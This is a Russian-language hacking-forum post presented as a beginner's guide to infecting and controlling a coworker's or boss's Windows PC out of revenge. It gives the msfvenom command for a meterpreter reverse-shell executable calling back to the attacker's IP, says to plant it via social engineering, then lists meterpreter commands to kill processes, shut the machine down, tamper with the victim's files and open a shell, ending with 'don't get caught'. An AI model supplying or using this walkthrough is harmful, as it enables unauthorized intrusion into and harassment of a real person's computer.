T
to_0day
Добрый день, дорогие форумчане. Да, давно не было статей, но все же. Это будет скорее руководство по управлению зараженным компьютером. Приступим.
Введение
Допустим вы работаете в крупной компании или команде и вас начинает бесить ваш коллега/тимлид/начальник. Ну вы поняли. Вот и пришло время отомстить этому человеку за все его грехи. Если он кончено не особо осведомлен в области информационной безопасности. Но даже в таком случае мы можем скрыть наш вирус. Будем использовать традиционно Metasploit. Создадим полезную нагрузку (payload) для Windows. Да, в чем же суть этой статьи? Многие не особо шарят в этом деле и после заражения чужого ПК (если это произошло) не знают как работать. Поэтому я объясню все с нуля. Идем к практике.
Практика
Для начало нам надо запустить Kali Linux и естественно открыть терминал. После пишем данный код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Ваш IP LPORT=4444 -f exe -o название.exe
Объясняю где и что:
-p windows/meterpreter/reverse_tcp - полезная нагрузка
lport=4444 - порт куда будет идти обратное соединение
-f exe - формат нашей нагрузки
-o название.exe - сохранить код с названием по указанному адресу
И так. -p является обязательной частью нашего кода. Чтобы узнать целевой IP адрес пишем ifconfig. Для выведения полезных нагрузок вводим следующее:
msfvenom -l payloads
Дальше вы увидите список. Что делать знаете. Теперь после создания нашего вируса мы загружаем его на устройство нашего обидчика. Это делаете используя СИ. Заострять внимания не стану. Переходим к самой основной части. Управление компьютером жертвы.
Управление
И вот решающий момент. У нас открыта сессия Meterpreter и мы можем спокойно работать на устройстве. Что можно? К примеру проверим запущенные процессы. Вводим:
ps
И видим запущенные программы жертвы. Ну и допустим видим, что на компе запущен к примеру Microsoft World. Давайте вырубим его командой:
kill 1400
Число означает идентификатор запущенной программы. Вы их увидите при предыдущем запросе. Мало? Тогда давайте вырубим его комп:
shutdown
И тут уже будут подозрения на счет того, что комп сошел с ума. Это заставит нашу жертву подумать на счет своей безопасности. К примеру мы там нашли какой-нибудь текстовый документ. Давайте попробуем отредактировать его через vim. Пишем:
edit filename.txt
Где filename ставим название любого текстового документа расположенном на устройстве жертвы. Таким образом мы открываем его. Ну и допустим можете написать в нем что-то вроде:
Hi, you’ve been hacked.
Hacker Pr0_ogrammer //Здесь ставьте свое название
Короче, все зависит от вашей фантазии. Но... есть некоторые баги. Нам нужно перенести файл на рабочий стол. Запускаем командную консоль:
shell
И дальше пишем такой код:
notepad filename.txt
Ну и наслаждаемся результатом. Все очень просто, но и одновременно прикольно. Если кого-то заинтересовала такая тема можем продолжить.
Вывод
Данная тема больше рассчитана для новичков в этом деле, чем профессионалов. Это очевидно, но цель данной статьи немного расширить границы и дать начинающим хакерам немного полезной информации. И это только малая часть того на что способен Metasploit. Ну а на этом статья подошла к концу. Удачи, и не попадитесь
Последнее редактирование модератором: